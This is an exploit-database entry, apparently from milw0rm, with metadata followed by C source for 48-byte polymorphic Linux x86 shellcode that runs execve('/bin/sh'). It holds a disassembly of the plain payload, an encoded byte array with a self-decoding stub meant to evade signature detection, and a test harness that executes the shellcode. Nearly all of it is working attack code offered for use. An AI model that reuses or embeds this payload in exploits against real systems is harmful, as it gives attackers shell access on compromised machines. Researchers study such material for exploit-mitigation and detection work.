Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (48 bytes)
Author: Jonathan Salwan
type:
platform: linux_x86
port: 48.0
date_added: 2009-08-10
date_updated: 2018-01-16
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
/*
Title: Polymorphic Shellcode /bin/sh - 48 bytes
Author: Jonathan Salwan
Mail: submit [!] shell-storm.org
! DataBase of shellcode : http://www.shell-storm.org/shellcode/
Original Informations
=====================
Disassembly of section .text:
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 2f 2f 73 68 push $0x68732f2f
8048068: 68 2f 62 69 6e push $0x6e69622f
804806d: 89 e3 mov %esp,%ebx
804806f: 50 push %eax
8048070: 53 push %ebx
8048071: 89 e1 mov %esp,%ecx
8048073: 99 cltd
8048074: b0 0b mov $0xb,%al
8048076: cd 80 int $0x80
*/
#include "stdio.h"
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x32\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x32\xc1\x51\x69\x30\x30\x74\x69"
"\x69\x30\x63\x6a\x6f\x8a\xe4\x51"
"\x54\x8a\xe2\x9a\xb1\x0c\xce\x81";
int main()
{
printf("Polymorphic Shellcode - length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}
// milw0rm.com [2009-08-11]